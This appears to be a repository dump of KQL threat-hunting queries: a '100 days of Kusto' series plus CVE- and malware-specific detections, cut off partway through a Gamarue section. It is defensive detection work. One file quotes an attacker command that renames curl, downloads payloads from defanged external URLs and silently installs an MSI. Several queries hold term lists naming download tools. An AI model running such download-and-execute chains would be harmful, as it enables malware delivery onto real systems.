├── 100_days_of_kusto_2024 ├── Day1.md ├── Day10_dev_tunnels.md ├── Day10_vmware_zeroday_lpe_bug_check.md ├── Day11_azure_arc_persistence.md.md ├── Day11_powershell_comamnds.md ├── Day2.md ├── Day3.md ├── Day4.md ├── Day5.md ├── Day6_ms_ta_alert_attribution.MD ├── Day7_powershell_download_script_execution.md ├── Day8_printui.exe_suspicious_location.md ├── Day9_renamed_autoit.md └── _template.md ├── APT_turla_snake_hunt.md ├── CVE-2023-21554-Queuejump.md ├── CVE-2023-23397_kusto_queries.md ├── Cloud_Service_Discovery_SnaffPoint.md ├── GC2_Command_and_Control.md ├── Gamarue_Kusto_Queries.md ├── ISO_MOTW_Kusto_Queries.md ├── JavaScript_spawned_from_ISO.md ├── LOLBIN_MSHTA.md ├── LolBin_Winlogon_Suspicious_Network_Connection.md ├── MDE_Execution_BatloaderTTPs.md ├── MasatdonC2_Kusto_Query.md ├── OneNote_Related_Hunting_Queries.md ├── PASTE_SITES_HUNT_KUSTO_QUERIES.MD ├── PLAY_Ransomware_Kusto.md ├── PSExec_Process_Creation_Impacket_Metasploit.md ├── PowerShell_create_LNK_in_startup.md ├── Qakbot_Kusto_Queries.md ├── README.md ├── Raspberry_Robin_Kusto_Queries.md ├── RedCanary2023-ObfuscatedFilesorInfo.md ├── RedCanary2023-ProcessInjection.md ├── RedCanary2023-ServiceExecution.md ├── RedCanary2023-WMI.md ├── RedCanary2023-Windows_Command_Shell.md ├── RedCanary2023-rundll32.md ├── RedCanary2023_IngressToolTransfer.md ├── RedCanary2023_PowerShell.md ├── Regsvr32ExternalScriptLoad.md ├── Remote_Access_Tools.md ├── Rundll32_executing_DLL_from_Temp.md ├── Scheduled_Task_Kusto_Queries.md ├── SecurityIncidentStats ├── ShareFinder_Kusto_Query.md ├── T1003.001_LASS_dumping_werfault_exe.md ├── T1036.003_Masquerading-RenameSystemUtilities.md ├── T1087.001_AccountDiscovery-LocalAccount.md ├── Telegram_Shortened_Domains.md ├── USB_Device_Hunting.md ├── Ursniff_Kusto_Queries_DFIRReport.md ├── VBScript_stored_in_non-run_reg_key.md ├── Vidar_Kusto_Query.md ├── _template.md ├── admin_share_kusto_query.md ├── attackReport.md ├── autostart_persistence_kusto_query.md ├── 
aws_ec2_kusto_queries.md ├── blacklotus-registry-modification.md ├── brute_ratel_C4.md ├── bumblebee_dfirreport_20221114.md ├── chrome_browser_unusual_child_process.md ├── chromeloader.md ├── command_and_control-GC2-Tool.md ├── command_and_control_NotionC2.md ├── commandandcontrol_stealer_redline_pastebin.md ├── emotet-2023-new-ttps.md ├── external_data_botnets_tracker_abuse_ch.kusto ├── external_data_lookup_bazaar_abuse_ch.kusto ├── gootloader.md ├── hiding_in_plain_sight_service_names.md ├── impacket_kusto_queries.md ├── inmemory_load_of_hacktool-powersploit.md ├── inmemory_load_of_hacktool.md ├── internal_phishing.md ├── ipfs_phishing_kusto_query.md ├── lactrodectus.md ├── lolbin_certutil_download_direct_ip.md ├── lolbins_kusto_query.md ├── m365_email_hunt_rules.md ├── m365_phishing_coronation_lures.md ├── mal_clearfake_appx_download.md ├── mal_clearfake_c2.md ├── mal_clearfake_test.md ├── mal_ttp_socgholish_suspicious_wscript_network_connetion.md ├── md_cloudflared_akira.md ├── mde_AAD_recon_tools.md ├── mde_SQLServerAbuse_CMD.md ├── mde_ZIPdomains.md ├── mde_bunny_loader_detections_2023.md ├── mde_commandandcontrol_.md ├── mde_darkgate_autoitScript.md ├── mde_darkgate_detections.md ├── mde_darkgate_sharepoint_ceo_link.md ├── mde_darkgate_vbs_download.md ├── mde_exfiltration_to_S3.md ├── mde_exploitguard_events.md ├── mde_file_downloads.md ├── mde_headlessBrowserChromium.md ├── mde_initiaaccess_qr_code.md ├── mde_mal_munchkin_raas.md ├── mde_persistence_registry_winlogon_t1547.md ├── mde_rmm_tools.md ├── mde_scatteredspider.md ├── mde_script_execution_from_explorer_ZIP_function.md ├── mde_smartscreen_events.md ├── mde_smb_filecopy.md ├── mde_stealer.md ├── mde_unusual_discord_network_connection.md ├── mde_various_loldrivers.md ├── med_tampering_event.md ├── nf_mal-ttp_t1059_007_gootloader.md ├── nf_mal-ttp_t1218.011_gootloader.md ├── nf_mal_ttp_cve-2023-36025_phemedroneStealer.md ├── nf_mal_ttp_t1620_gootloader.md ├── nf_ransomware_leaksite_monitoring.md ├── 
nf_ttp_blackbasta_quickassist.md ├── nf_ttp_execution_apt_turla.md ├── nf_ttp_generic_kerberos_attacks.md ├── nf_ttp_ioc_3cx_DLL_SideLoading_IoC_Kusto.md ├── nf_ttp_kapeka_sandworm.md ├── nf_ttp_persistence_apt_turla.md ├── nf_ttp_polyfill_supplychain_attack.md ├── nf_ttp_possibleExfiltrationViaUSB.md ├── nf_ttp_shadowlink_sandworm.md ├── nf_ttp_smoke-sandstorm_unusual_coreuicomponent.dll-behaviour.md ├── nf_ttp_t1027-010_powershellEcodedCommand.md ├── nf_ttp_t1059-001_powershell_windowsappsdir_fin7.md ├── nf_ttp_t1127-001_suspNetworkConnMSBuild.md ├── nf_ttp_t1219_netsupportrat_fin7.md ├── nf_ttp_t1219_scattered_spider_rmm-tools.md ├── nf_ttp_t1543_scattered-spider_azure_arc_persistence.md ├── nf_ttp_t1547-001_yellowcockatoo_powershell_create_link_in_starup ├── nf_ttp_t1562-001_disabledefender.md ├── nf_ttp_t1562.001_scattered-spider_abuse conditional_access_trusted_locations.md ├── nf_ttp_t1566-001_IPFS_Web3_Phishing.md ├── nf_ttp_t1567-002_scattered-spider_exfiltration.md ├── nf_vuln_linux_cups.md ├── powerShellHunts.md ├── powershell_dirty_word_detection.md ├── proxy_shell_kusto_queries.md ├── raas_blackbyte.md ├── rclone_detection.md ├── redditC2.md ├── registry_run_key_persistence.md ├── remcos_rat_kusto_queries_09032023.md ├── scheduled_task_peristence_from_roaming_folder.md ├── tampering_with_windows_event_log.md ├── test.bat ├── test.csv ├── ttp_initialaccess_phishing_zip_domains.md ├── ttp_initialaccess_teamPhishing.md ├── ttp_pythonexecuted_from_pythonsetupfile.md └── ttp_usb_exfiltration. 
md /100_days_of_kusto_2024/Day1.md: -------------------------------------------------------------------------------- 1 | # Day 1 - Decode base64 with KQL 2 | 3 | ## Description 4 | 5 | The below query provides an example of how the base64_decode_tostring() function can be used to decode a field value that is base64 encoded 6 | 7 | ``` KQL 8 | 9 | let base64 = "SW52b2tlLVdtaU1ldGhvZCAtQ29tcHV0ZXJOYW1lICRTZXJ2ZXIgLUNsYXNzIENDTV9Tb2Z0d2FyZVVwZGF0ZXNNYW5hZ2VyIC1OYW1lIEluc3RhbGxVcGRhdGVzIC0gQXJndW1lbnRMaXN0ICgsICRQZW5kaW5nVXBkYXRlTGlzdCkgLU5hbWVzcGFjZSByb290WyZjY20mXWNsaWVudHNkayB8IE91dC1OdWxs"; 10 | print base64_decode_tostring(base64) 11 | 12 | ``` -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day10_dev_tunnels.md: -------------------------------------------------------------------------------- 1 | UPDATE: Looks like MS released GPO controls finally: https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/policies 2 | This query is designed to detect suspicious network communications involving Visual Studio's DevTunnels feature, which is used for secure remote connections and debugging. The query specifically looks for network events where the destination URL ends with tunnels.api.visualstudio.com or devtunnels.ms. It excludes legitimate Visual Studio processes (ServiceHub.Host.dotnet.x64.dll or ServiceHub.Host.dotnet.arm64) to focus on potentially unauthorized or malicious activity. By monitoring these criteria, the query aims to identify unusual or suspicious use of DevTunnels that could indicate unauthorized remote access or data exfiltration. 
DeviceNetworkEvents
| where RemoteUrl endswith "tunnels.api.visualstudio.com" or RemoteUrl endswith "devtunnels.ms"
// `!~` is the case-insensitive comparison; `!=` is case-sensitive, so a differently-cased value would slip past the exclusion.
// VersionInfo fields are attacker-controllable (a renamed or re-stamped binary can carry any value), so treat these exclusions as noise reduction, not as proof that the process is legitimate.
| where InitiatingProcessVersionInfoOriginalFileName !~ @"ServiceHub.Host.dotnet.x64.dll"
| where InitiatingProcessVersionInfoFileDescription !~ @"ServiceHub.Host.dotnet.arm64"

This query is designed to detect suspicious file activity in folders named "DevTunnels", which Visual Studio uses for its remote-connection feature. The goal is to identify potentially unauthorized or malicious operations in these folders, which could indicate an attempt to establish or maintain unauthorized remote access to the system.

The query works by:

Monitoring file events (DeviceFileEvents) where the folder path includes "DevTunnels".
Excluding known legitimate software, specifically Dell Display Manager 2, to avoid false positives.
In simple terms, this query helps identify unusual file activity in "DevTunnels" folders, which might be used by attackers, while ignoring activity from trusted software.

DeviceFileEvents
| where FolderPath has "DevTunnels"
// exclude Dell Display Manager. Keep this filter on its own line: a `//` comment runs to end of line, so writing the `| where` after the comment (as the original did) comments the exclusion out and it never applies.
| where InitiatingProcessFileName !~ "DellDisplayManager.exe"

Device process events hunt query for VS Code DevTunnels where the executable has been renamed.

DeviceProcessEvents
| where InitiatingProcessVersionInfoOriginalFileName =~ "electron.exe" and ProcessCommandLine has_all ("tunnel",".exe")
--------------------------------------------------------------------------------
/100_days_of_kusto_2024/Day10_vmware_zeroday_lpe_bug_check.md:
--------------------------------------------------------------------------------
# Day 10 - Active exploitation of VMware ESXi hypervisor escape (ESXicape)

## Description

Yesterday, VMware quietly released patches for three ESXi zero-day vulnerabilities: CVE-2025-22224, CVE-2025-22225, CVE-2025-22226.
This KQL identifies VMware guest virtual machines in your environment (by the presence of VMware Tools processes) and then lists those guests that still carry unpatched local privilege escalation (LPE) CVEs. The ESXi CVEs themselves are hypervisor-side and will not appear in a guest's vulnerability inventory; the reason to hunt guest LPEs is that the escape is exploited from a privileged position inside a VM, so an unpatched guest LPE widens the set of users who could reach that position.

### Example Script

```



```

## References
https://cyberplace.social/@GossiTheDog/114114843502983550
https://doublepulsar.com/use-one-virtual-machine-to-own-them-all-active-exploitation-of-esxicape-0091ccc5bdfc

## Query MDE

``` KQL

// VMware hypervisor escape possibilities. Lists VMware guests that still have unpatched local privilege escalation CVEs.
// Guest detection relies on VMware Tools binaries having run inside the lookback window; guests without Tools installed are not seen.
let VMWareVM = DeviceProcessEvents
| where FileName in~ ("vmtoolsd.exe", "vmwaretray.exe")
| distinct DeviceId;
DeviceTvmSoftwareVulnerabilities
| where DeviceId in~ (VMWareVM)
| where CveId in~ ("CVE-2025-21418","CVE-2025-21391") // replace with LPE CVE IDs of your choosing
| project DeviceName, CveId, SoftwareName, SoftwareVersion, VulnerabilitySeverityLevel

```


--------------------------------------------------------------------------------
/100_days_of_kusto_2024/Day11_azure_arc_persistence.md.md:
--------------------------------------------------------------------------------
Defender For Endpoint
// Unexpected installation of azure arc agent - service installation
// NOTE: a KQL query can end in only one tabular expression, so the two hunts in this file must be run separately; pasting both into one editor window fails at the second `let`.
// NOTE: the ServiceInstalled event's ServiceName appears to be the registered service name rather than the binary, so the ".exe" entries below may not match; confirm the agent's actual service names on a known Arc-enrolled host and adjust the list.
let ServiceNames = datatable(name:string)["himds.exe","gc_arc_service.exe","gc_extension_service.exe"];
DeviceEvents
| where ActionType =~ "ServiceInstalled"
| extend ServiceName = tostring(parse_json(AdditionalFields).ServiceName)
| extend ServiceAccount = tostring(parse_json(AdditionalFields).ServiceAccount)
| extend ServiceStartType = tostring(parse_json(AdditionalFields).ServiceStartType)
| extend ServiceType = tostring(parse_json(AdditionalFields).ServiceType)
| where ServiceName has_any (ServiceNames)

// Unexpected installation of azure arc agent - filepaths (second, separate query)
let AzureArcServicePaths = datatable(name:string)[@"\\AzureConnectedMachineAgent\\GCArcService\\GC"];
DeviceFileEvents
| where ActionType =~ "FileCreated"
| where FolderPath has_any 
(AzureArcServicePaths)
--------------------------------------------------------------------------------
/100_days_of_kusto_2024/Day11_powershell_comamnds.md:
--------------------------------------------------------------------------------

# Day 11 - Suspicious PowerShell Commandline

## Description
Detection opportunity: PowerShell using Invoke-Expression to download content

This pseudo detection analytic identifies instances of PowerShell using Invoke-Expression to execute content downloaded from an HTTP(S) URL. Adversaries delivering threats like LummaC2 use this function to fetch remotely hosted scripts and code for further exploitation of an endpoint. Note that legitimate package-management and orchestration utilities like Chocolatey may use this function to update themselves, so review the URL host and the parent process before escalating.

### Example Script

```

N/A

```

## References
https://redcanary.com/blog/threat-intelligence/intelligence-insights-november-2024/

## Query MDE

``` KQL

// Match the PowerShell process itself (FileName/ProcessCommandLine) as well as anything it launched
// (InitiatingProcessFileName/InitiatingProcessCommandLine). The original form paired the parent's name
// with the child's command line, which only fires when PowerShell spawns a second process that itself carries iex,
// and misses the primary case of powershell.exe launched directly with iex in its own command line.
// `has "http"` matches the whole term, so "https" has to be listed separately.
DeviceProcessEvents
| where (FileName in~ ("powershell.exe", "pwsh.exe")
         and ProcessCommandLine has_any ("iex", ".invoke", "invoke-expression")
         and ProcessCommandLine has_any ("http", "https"))
     or (InitiatingProcessFileName in~ ("powershell.exe", "pwsh.exe")
         and InitiatingProcessCommandLine has_any ("iex", ".invoke", "invoke-expression")
         and InitiatingProcessCommandLine has_any ("http", "https"))
| project Timestamp, DeviceName, AccountName, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine


```



--------------------------------------------------------------------------------
/100_days_of_kusto_2024/Day2.md:
--------------------------------------------------------------------------------
# Day 2 - calculating the difference between two dates using KQL

## Description

The below query provides an example of how to calculate the difference between two datetime values using KQL. Subtracting one datetime from another yields a timespan; the result is negative when the first value is earlier than the second, as it is in this example (the file executed before the email was received).

``` KQL

let emailRecieved = datetime("2024-01-31T11:11:12Z");
let fileExecuted = datetime("2024-01-31T10:26:20Z");
print fileExecuted - emailRecieved

```
--------------------------------------------------------------------------------
/100_days_of_kusto_2024/Day3.md:
--------------------------------------------------------------------------------
# Day 3 - Search for a value in multiple tables

## Description

The below query provides an example of how the search operator can be used to find results across all tables. An unscoped search scans every table in the workspace, so in a large tenant always bound it with a time filter (the portal's time-range picker, or a `where` on the table's timestamp column) or narrow it to a single table as in the second example.

``` KQL

search "my-keyword"

```

The below query provides an example of how the search operator can be used to find results in a specific table

``` KQL

table1
| search "my-keyword"

```
--------------------------------------------------------------------------------
/100_days_of_kusto_2024/Day4.md:
--------------------------------------------------------------------------------
# Day 4 - Using let statements

## Description

Basic use of a let statement to build a table of values that can be used in a subsequent query

``` KQL

let mary_ips = //sets a variable called mary_ips
Employees //use the Employees table
| where name has "Mary" //filter results to those that have Mary in the name field
| distinct ip_addr; //output a distinct list of IP addresses assigned to users called Mary; the ; ends the let statement
OutboundNetworkEvents // use the OutboundNetworkEvents table
| where src_ip in~ (mary_ips) // filter on the src_ip field using the ips we produced in our let statement
| summarize dcount(url) // provide a distinct count of urls visited by IP addresses assigned to users called Mary

```
--------------------------------------------------------------------------------
/100_days_of_kusto_2024/Day5.md:
--------------------------------------------------------------------------------
# Day 5 - A basic join of two tables

## Description

The below query provides an example of how to join two tables 
that share a common field called hostname. Note that `join` without an explicit `kind` defaults to `innerunique`, which keeps only one left-side row per key value; use `join kind=inner` when you want every matching FileCreationEvents row returned.

``` KQL

FileCreationEvents
| join Employees on $left.hostname == $right.hostname

```
--------------------------------------------------------------------------------
/100_days_of_kusto_2024/Day6_ms_ta_alert_attribution.MD:
--------------------------------------------------------------------------------
# Day 6 - Search alerts for Microsoft Threat Actor names

## Description

The below query provides an example of how to search alerts for Microsoft threat actor names. This can be used to understand whether there have been any alerts related to Microsoft-tracked threat actors in your environment. The weather-themed family names are also ordinary English words ("Rain", "Dust", "Hail", "Flood"), and `has_any` matches them as whole terms wherever they appear in a title (the trailing hyphen in "Storm-" is not part of the term, so it matches any "Storm"), so expect some unrelated alerts in the results; pivot on the full two-word actor name where the title carries one.

# Sentinel

``` KQL

let TANames = datatable(PreviousName: string)[
"Typhoon",
"Sandstorm",
"Rain",
"Sleet",
"Blizzard",
"Hail",
"Dust",
"Cyclone",
"Tempest",
"Tsunami",
"Flood",
"Storm-"];
SecurityAlert
| where AlertName has_any (TANames)

```

# MDE


``` KQL

let TANames = datatable(PreviousName: string)[
"Typhoon",
"Sandstorm",
"Rain",
"Sleet",
"Blizzard",
"Hail",
"Dust",
"Cyclone",
"Tempest",
"Tsunami",
"Flood",
"Storm-"];
AlertInfo
| where Title has_any (TANames)

```
--------------------------------------------------------------------------------
/100_days_of_kusto_2024/Day7_powershell_download_script_execution.md:
--------------------------------------------------------------------------------
# Day 7 - Script launching PowerShell to download and execute a payload

## Description

The following pseudo-detection analytic will identify wscript, cscript, or mshta launching PowerShell to download and execute a payload. Threats like Saffron Starling abuse this cmdlet to download and launch malicious code. 
Note that this cmdlet can be used legitimately for maintenance tasks and device administration, so you may need to investigate further to determine whether the activity is malicious. Child processes and file modifications in suspicious directories can be signs of successful payload execution.

### Example Script

```
"C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\user\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\user\Documents\QMQjaBdqIo.pdf" hxxps://bologna.sunproject[.]dev/download/pdf & "C:\Users\user\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://rome.sunproject[.]dev/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
```

## References
https://redcanary.com/blog/threat-intelligence/intelligence-insights-february-2025/

## Query MDE

``` KQL

// Parent chain: script host -> cmd.exe / PowerShell -> this process.
// The original filter looked for "invoke_webrequest", which is not the cmdlet's name (Invoke-WebRequest) and cannot be
// relied on to match it; the term list below covers that cmdlet, its aliases and the other download primitives,
// including the copied-and-renamed curl.exe seen in the example above.
// Because the example renames curl.exe, the download verb can sit in the parent's command line (cmd.exe) rather than
// the child's, so both command lines are checked. Tune the list (certutil/bitsadmin/curl) if it is noisy in your estate.
let DownloadTerms = dynamic(["invoke-webrequest", "iwr", "invoke-restmethod", "irm", "downloadstring", "downloadfile", "start-bitstransfer", "bitsadmin", "certutil", "curl", "wget"]);
DeviceProcessEvents
| where InitiatingProcessParentFileName in~ ("wscript.exe", "cscript.exe", "mshta.exe")
    and InitiatingProcessFileName in~ ("cmd.exe", "powershell.exe", "pwsh.exe")
    and (ProcessCommandLine has_any (DownloadTerms) or InitiatingProcessCommandLine has_any (DownloadTerms))
| project Timestamp, DeviceName, AccountName, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine

```
--------------------------------------------------------------------------------
/100_days_of_kusto_2024/Day8_printui.exe_suspicious_location.md:
--------------------------------------------------------------------------------
# Day 8 - printui.exe relocated to a suspicious location

## Description

**Detection opportunity:** printui.exe relocated to a suspicious location
This pseudo detection analytic identifies instances of printui.exe relocated outside of Windows\System32. Relocation of this binary outside of System32 will be highly unusual, although third-party system administrative binaries may occasionally utilize a relocated and/or renamed version of the binary. 
Vulnerable DLLs like printui.dll can be abused by threats like Tangerine Turkey for **DLL search order hijacking** and side-loading. Here at Red Canary we have profiled System32 binaries, collected and stored their expected metadata, and used the information to build detection analytics. 7 | 8 | ### Example Script / Pseudo Code 9 | 10 | ``` 11 | 12 | Pseudo query - process_path_is_unexpected == (printui) 13 | 14 | ``` 15 | 16 | ## References 17 | 18 | https://redcanary.com/blog/threat-intelligence/intelligence-insights-january-2025/ 19 | 20 | ## Query MDE 21 | 22 | ### Device Process Events 23 | 24 | ``` KQL 25 | 26 | DeviceProcessEvents 27 | | where ( InitiatingProcessFileName =~ "printui.exe" and not ( InitiatingProcessFolderPath has_any ( @"Windows\System32", @"Windows\\System32", @"Windows\SysWOW64" ) ) ) or ( FileName =~ "printui.exe" and not (FolderPath has_any ( @"Windows\System32", @"Windows\\System32", @"Windows\SysWOW64" ) ) ) 28 | 29 | ``` 30 | 31 | ### Device File Events 32 | 33 | ``` KQL 34 | //Lower Fidelity 35 | DeviceFileEvents 36 | | where ( ActionType in~ ("FileCreated","FileModified") and FileName =~ "printui.exe" and not ( FolderPath has_any ( @"Windows\System32", @"Windows\\System32", @"Windows\SysWOW64" ) ) ) 37 | 38 | ``` 39 | -------------------------------------------------------------------------------- /100_days_of_kusto_2024/Day9_renamed_autoit.md: -------------------------------------------------------------------------------- 1 | # Day 9 - Detection opportunity: Renamed instances of AutoIT 2 | 3 | ## Description 4 | 5 | This pseudo detection analytic identifies renamed instances of AutoIT. Adversaries—like those behind HijackLoader—use this tool to execute scripts with goals including C2 communication and additional payload delivery. The renamed binary may be located in a suspicious location like TEMP, APPDATA, or with a path that includes seemingly randomly generated names. 

### Example Script / Pseudo Code

```

process_is_renamed == (autoit)*

```

## References

https://redcanary.com/blog/threat-intelligence/intelligence-insights-december-2024/

## Query MDE

### Renamed autoit files from certain locations

``` KQL

// `has_any` does term matching and has no wildcard support, so the original "C:\\Users\\*" style entries behaved as
// plain path prefixes (and "C:\\Users\\*" already covered the two AppData entries); the list is written as prefixes here.
let SuspiciousLocations = dynamic(["C:\\Users\\", "C:\\ProgramData\\", "C:\\Windows\\Temp\\"]);
let KnownAutoITNames = dynamic(["autoit.exe", "autoit3.exe"]);
DeviceProcessEvents
| where ProcessCommandLine has_any ("autoit", "autoit3") // Catch common AutoIT executions
// `in~` rather than `in`: the shipped binary is named AutoIt3.exe and `in` is case-sensitive, so the exclusion would otherwise never fire
| where not(InitiatingProcessFileName in~ (KnownAutoITNames)) // Exclude expected process names
| where FolderPath has_any (SuspiciousLocations) // Check for execution from suspicious locations
| where InitiatingProcessFileName !contains "Updater" // Exclude legitimate software updaters
| extend RenamedAutoIT = iff(InitiatingProcessFileName !in~ (KnownAutoITNames), "Renamed AutoIT Instance", "Legit AutoIT")
| project Timestamp, DeviceName, InitiatingProcessParentFileName, InitiatingProcessCommandLine, InitiatingProcessFileName, FolderPath, RenamedAutoIT

```

### Renamed autoit files

``` KQL

// `!has "autoit"` is a whole-term test, so the legitimately named AutoIt3.exe (term "autoit3") passed it and was reported
// as renamed; `!contains` is a substring test and excludes any file name that still carries "autoit" in it.
DeviceProcessEvents
| where ( FileName !contains "autoit" and ProcessVersionInfoOriginalFileName has_any ("autoit", "autoit3") ) or ( InitiatingProcessFileName !contains "autoit" and InitiatingProcessVersionInfoOriginalFileName has_any ("autoit", "autoit3") )

```
--------------------------------------------------------------------------------
/100_days_of_kusto_2024/_template.md:
--------------------------------------------------------------------------------
# Day N - <title>

## Description



### Example Script

```



```

## References


## Query MDE

``` KQL



```
--------------------------------------------------------------------------------
/CVE-2023-21554-Queuejump.md:
--------------------------------------------------------------------------------
# CVE-2023-21554

## Source: Fabian Bader [@fabian_bader](https://twitter.com/fabian_bader) I made some tweaks to Fabian's original queries to utilise slightly different fields.

## Identify hosts with the service and listening port:

### MDE

```
// LocalPort is an int column; comparing it to the string "1801" is a type mismatch in KQL, so the literal is numeric here (as it already was in the exploitation query below)
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where ActionType == "ListeningConnectionCreated"
| where LocalPort == 1801
| where InitiatingProcessVersionInfoOriginalFileName has "MQSVC"
| summarize by DeviceName
```

### Sentinel

```
DeviceNetworkEvents
| where TimeGenerated > ago(30d)
| where ActionType == "ListeningConnectionCreated"
| where LocalPort == 1801
| where InitiatingProcessVersionInfoOriginalFileName has "MQSVC"
| summarize by DeviceName
```

## Look for possible exploitation of CVE-2023-21554

```
//possible exploitation of CVE-2023-21554
//if successful look for a follow-up outbound connection to the same external IP or to a possible secondary C2 connection. This would likely result in a child process being spawned from mqsvc.exe that should also be investigated. On the external facing infra this will likely materialise in a webshell or similar. 
34 | DeviceNetworkEvents 35 | | where InitiatingProcessFileName =~ "mqsvc.exe" and LocalPort == 1801 and ActionType == 'InboundConnectionAccepted' 36 | ``` 37 | 38 | ### Look for child processes spawned by mqsvc.exe 39 | 40 | ``` 41 | DeviceProcessEvents 42 | | where ( InitiatingProcessFileName has "mqsvc.exe" and isnotempty(FileName) ) or (InitiatingProcessParentFileName has "mqsvc.exe" and isnotempty(InitiatingProcessFileName) ) 43 | ``` 44 | -------------------------------------------------------------------------------- /CVE-2023-23397_kusto_queries.md: -------------------------------------------------------------------------------- 1 | # EXPERIMENTAL 2 | 3 | # CVE-2023-23397 4 | 5 | Big hand to Dominic Chell, Florian Roth, Nasreddine Bencherchali for their research into this vulnerability. 6 | 7 | References: 8 | - MDSec Post: https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ 9 | - Florian Roth / Nasreddine Bencherchali: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml 10 | 11 | 12 | ## SecurityEvent 13 | 14 | `SecurityEvent | where EventID == 4688 | where (ParentProcessName endswith @'\svchost.exe' and NewProcessName endswith @'\rundll32.exe' and CommandLine contains @'C:\windows\system32\davclnt.dll,DavSetCookie' and CommandLine matches regex @'(?i)://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}') and not (CommandLine has_any (@'://10.',@'://192.168.',@'://172.16.',@'://172.17.',@'://172.18.',@'://172.19.',@'://172.20.',@'://172.21.',@'://172.22.',@'://172.23.',@'://172.24.',@'://172.25.',@'://172.26.',@'://172.27.',@'://172.28.',@'://172.29.',@'://172.30.',@'://172.31.',@'://127.',@'://169.254.'))` 15 | 16 | `//pseudocode 17 | SecurityEvent 18 | | where ((Process contains ("rundll32.exe") and CommandLine contains("davclnt.dll")) 19 | | where not ((ParentProcessName contains ("cmd.exe")) 20 | | project TimeGenerated, 
Computer, tostring(EventID), ParentProcessName, NewProcessName, CommandLine, SubjectUserName, SourceComputerId, processID=tolong(NewProcessId), parentProcessID=tolong(ProcessId), EventData 21 | | order by TimeGenerated` 22 | 23 | 24 | ## Defender for Endpoint Queries 25 | 26 | `DeviceProcessEvents | where (InitiatingProcessFolderPath endswith @'\svchost.exe' and FolderPath endswith @'\rundll32.exe' and ProcessCommandLine contains @'C:\windows\system32\davclnt.dll,DavSetCookie' and ProcessCommandLine matches regex @'(?i)://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}') and not (ProcessCommandLine has_any (@'://10.',@'://192.168.',@'://172.16.',@'://172.17.',@'://172.18.',@'://172.19.',@'://172.20.',@'://172.21.',@'://172.22.',@'://172.23.',@'://172.24.',@'://172.25.',@'://172.26.',@'://172.27.',@'://172.28.',@'://172.29.',@'://172.30.',@'://172.31.',@'://127.',@'://169.254.'))` 27 | 28 | `//playing with these at present 29 | DeviceNetworkEvents 30 | | extend f = extract(@'(?i)://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})',1,InitiatingProcessCommandLine) 31 | | where InitiatingProcessFileName =~ "rundll32.exe" and ipv4_is_private(RemoteIP) == false and isnotempty(f) //and not (RemoteIP has_any ("127.","169.254.")) 32 | | project TimeGenerated, ActionType, DeviceName, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessCommandLine, InitiatingProcessId, InitiatingProcessMD5, InitiatingProcessParentFileName, InitiatingProcessParentId, LocalIP, LocalPort, RemoteIP, RemotePort, RemoteUrl` 33 | 34 | `//playing with these at present 35 | DeviceNetworkEvents 36 | | extend f = extract(@'(?i)://(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})',1,InitiatingProcessCommandLine) 37 | | where InitiatingProcessFileName =~ "rundll32.exe" and ipv4_is_private(RemoteIP) == false and isnotempty(f) and not (RemoteIP has_any ("127.","169.254.")) 38 | | project TimeGenerated, ActionType, DeviceName, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessCommandLine, 
InitiatingProcessId, InitiatingProcessMD5, InitiatingProcessParentFileName, InitiatingProcessParentId, LocalIP, LocalPort, RemoteIP, RemotePort, RemoteUrl` 39 | 40 | `DeviceTvmSoftwareVulnerabilities 41 | | where CveId =~ "CVE-2023-23397" 42 | | distinct DeviceName` 43 | 44 | `//Identify outbound SMB connections to public IPs 45 | DeviceNetworkEvents 46 | | where RemotePort == 445 and ipv4_is_private(RemoteIP) == false and RemoteIP !~ "127.0.0.1" and RemoteIP !startswith "169.254."` 47 | -------------------------------------------------------------------------------- /Gamarue_Kusto_Queries.md: -------------------------------------------------------------------------------- 1 | # Gamarue 2 | Gamarue is a worm that primarily spreads via USB drives. Despite its command and control (C2) infrastructure being disrupted in 2017, Gamarue keeps worming its way through many environments. 3 | 4 | # Source: https://redcanary.com/threat-detection-report/threats/gamarue/ 5 | 6 | ## Special characters in rundll32 command line 7 | ``` 8 | //Editors’ note: While the analysis and detection opportunities remain applicable, this threat page was written for a previous Threat Detection Report and has not been updated in 2022. 9 | //Special characters in rundll32 command line 10 | //ATT&CK technique(s): T1218.011 Signed Binary Proxy Execution: Rundll32 11 | //ATT&CK tactic(s): Defense Evasion, Execution 12 | //Details: The main detection analytic that helped us catch so much Gamarue was based on what we noticed about how Gamarue executed rundll32.exe. As we examined multiple Gamarue detections over time, we noticed that their rundll32.exe command lines consistently used the same number of characters in a repeatable pattern—25 characters followed by a period followed by 25 additional characters, then a comma and 16 more characters. 
For example:
//source: https://redcanary.com/threat-detection-report/threats/gamarue/
// The analytic is about rundll32.exe's own command line, so the rundll32 process itself is matched (FileName/ProcessCommandLine);
// the InitiatingProcess* side is kept so that children spawned by such a rundll32 instance are surfaced as well.
DeviceProcessEvents
| where ( FileName =~ "rundll32.exe" and ProcessCommandLine matches regex @'(?i)"C:\\Windows\\system32\\rundll32\.exe"\s+\\\S{25}\.\S{25},\S{16}' )
     or ( InitiatingProcessFileName =~ "rundll32.exe" and InitiatingProcessCommandLine matches regex @'(?i)"C:\\Windows\\system32\\rundll32\.exe"\s+\\\S{25}\.\S{25},\S{16}' )
```

## Windows Installer (msiexec.exe) external network connections
```
